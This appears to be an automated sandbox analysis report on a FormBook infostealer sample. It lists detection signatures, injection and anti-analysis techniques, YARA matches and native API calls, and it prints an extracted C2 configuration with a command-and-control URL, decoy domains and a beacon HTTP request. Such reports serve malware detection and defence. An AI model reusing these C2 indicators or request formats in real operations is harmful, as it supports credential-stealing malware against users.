Analysis Report Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Overview

General Information

Sample Name:	Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
Analysis ID:	411769
MD5:	4e71f90d1817f44313f4e101ef393968
SHA1:	3932f9822134761e7bf9bc1902f8cc28b6820559
SHA256:	aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
Tags:	exeFormbooksigned
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

DLL side loading technique detected

Drops PE files to the user root directory

Drops executables to the windows directory (C:\Windows) and starts them

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Suspicious powershell command line found

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Non Interactive PowerShell

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

AV Detection:

Found malware configuration

Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.clinics.life/qku9/"], "decoy": ["infinitilifecenters.com", "newsondogs.com", "enonen.com", "skinnybrew.asia", "evaair-dailoan.com", "kakao.delivery", "kenistic.com", "dichvuquatanghtc.com", "avbs1.xyz", "dornhome.com", "uuyuii.com", "elearningeasygenerator.com", "basnne.com", "snkrclassics.com", "healthtechcentral.com", "earthhoodpal.com", "voorgoed.com", "lazycooked.com", "openrank.site", "georgeswebwerks.com", "diabluma.com", "kenekch.net", "fragrans.paris", "dov12.com", "traumainformed.love", "rocket3freedom.com", "smartgrowcultiva.com", "financial345.com", "maxsecuritycompany.com", "ibitr.com", "tamhoo.com", "reciclar.space", "agustoscimerapk-tr.com", "risingstarg.com", "kambosito.space", "bossdeal.online", "xn--avenr-wsa.com", "tauznora.com", "rest-blog.com", "amercadear.com", "xn--e1agggwgm.xn--p1acf", "paintwaterlilly.com", "yago.pro", "kmakeupbrushes.com", "shawnshimazu.design", "homeverf.com", "latromi.com", "machacekbakery.com", "jillsfreegift.com", "nationwidemovingamerica.com", "healthyred.xyz", "thrg33.club", "orbit-shop.com", "akgunreklam.xyz", "vewesyqy.xyz", "contorig2.com", "reiadarealestate.com", "pmxgear.com", "chennaigranites.com", "jmboprivacy.com", "genunid.com", "alegria.club", "alexfuture.net", "anixussohigh.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Citvon\Citvon.exe	Metadefender: Detection: 35%	Perma Link
Source: C:\Users\Public\Citvon\Citvon.exe	ReversingLabs: Detection: 65%
Source: C:\Users\Public\NETUTILS.dll	ReversingLabs: Detection: 20%
Source: C:\Windows \System32\NETUTILS.dll	ReversingLabs: Detection: 20%

Multi AV Scanner detection for submitted file

Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Virustotal: Detection: 70%	Perma Link
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Metadefender: Detection: 35%	Perma Link
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	ReversingLabs: Detection: 65%

Yara detected FormBook

Source: Yara match	File source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Users\Public\Citvon\Citvon.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 25.2.Citvon.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 27.2.Citvon.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 27.1.Citvon.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 25.1.Citvon.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Source:	Binary string: msiexec.pdb source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: Citvon.exe, 00000019.00000002.867393416.0000000000960000.00000040.00000001.sdmp
Source:	Binary string: netplwiz.pdb source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
Source:	Binary string: netplwiz.pdbGCTL source: Netplwiz.exe, 00000008.00000002.702460692.00007FF61AD35000.00000002.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000003.00000002.698168920.0000000000B8F000.00000040.00000001.sdmp, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, Citvon.exe, 00000019.00000002.867470145.00000000009C0000.00000040.00000001.sdmp

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe

Code function: 4x nop then pop edi

3_2_0040C3DF

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.clinics.life/qku9/

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /qku9/?6lPDSJPH=4N2BxPNrndQhx4f7lxE8pKNuaIuSTDwEioPJ3Oup1sIb+BTUhD7Z9dt/VxNIQWQk9DQP&u8eTH=YdsPJP HTTP/1.1Host: www.georgeswebwerks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.117.212 198.54.117.212

Source: global traffic

Source: unknown

DNS traffic detected: queries for: onedrive.live.com

Source: powershell.exe, 0000000D.00000002.752129080.00000172C22AF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsof
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: Citvon.exe, 00000014.00000003.752641816.00000000008C4000.00000004.00000001.sdmp	String found in binary or memory: http://mscrl.micro
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658488547.000000000094F000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: Citvonvhciktufwvyzyhistnewdjgsoqdr.exe, 00000000.00000003.658494505.0000000000953000.00000004.00000001.sdmp, Citvon.exe, 00000011.00000003.736683075.000000000083A000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp	String found in binary or memory: http://osoft.com/PKI/doefault.htm0
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.752441482.00000172C23D0000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsoft.coT
Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.735431704.00000172AA0A1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.736959186.00000172AA43B000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.736725813.00000172AA2B1000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000003.711204031.00000172ABE21000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.749646155.00000172BA104000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Citvon.exe, 00000011.00000003.736694886.000000000083E000.00000004.00000001.sdmp, Citvon.exe, 00000014.00000003.752669738.00000000008D0000.00000004.00000001.sdmp	String found in binary or memory: https://xhtfga.dm.files.1drv.com/y4m8SMkzvpejvDLx8dnrECcyq_e2qmwA_A7cOWUQWdVRMq0yniUlzBSm_G1n5_On9Y_

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.916527302.0000000001270000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.826581239.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.866605894.0000000000580000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.826744888.00000000004B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.867119537.0000000000310000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000001.696290346.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000001.815038206.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.697862956.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.867284740.00000000008D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.915615898.0000000000E50000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.865473652.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.827144868.00000000005C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000001.796805895.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000002.916659708.00000000012A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.1.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Citvonvhciktufwvyzyhistnewdjgsoqdr.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.2.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.2.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 27.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.1.Citvon.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 25.1.Citvon.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004181B0 NtCreateFile,	3_2_004181B0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00418260 NtReadFile,	3_2_00418260
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004182E0 NtClose,	3_2_004182E0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00418390 NtAllocateVirtualMemory,	3_2_00418390
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041816A NtCreateFile,	3_2_0041816A
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004181AA NtCreateFile,	3_2_004181AA
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00418203 NtCreateFile,	3_2_00418203
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_004182DE NtClose,	3_2_004182DE
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_0041838C NtAllocateVirtualMemory,	3_2_0041838C
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9860 NtQuerySystemInformation,LdrInitializeThunk,	3_2_00AD9860
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD96E0 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_00AD96E0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9660 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_00AD9660
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD98A0 NtWriteVirtualMemory,	3_2_00AD98A0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD98F0 NtReadVirtualMemory,	3_2_00AD98F0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9820 NtEnumerateKey,	3_2_00AD9820
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9840 NtDelayExecution,	3_2_00AD9840
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00ADB040 NtSuspendThread,	3_2_00ADB040
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD99A0 NtCreateSection,	3_2_00AD99A0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD99D0 NtCreateProcessEx,	3_2_00AD99D0
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9910 NtAdjustPrivilegesToken,	3_2_00AD9910
Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exe	Code function: 3_2_00AD9950 NtQueueApcThread,	3_2_00AD9950
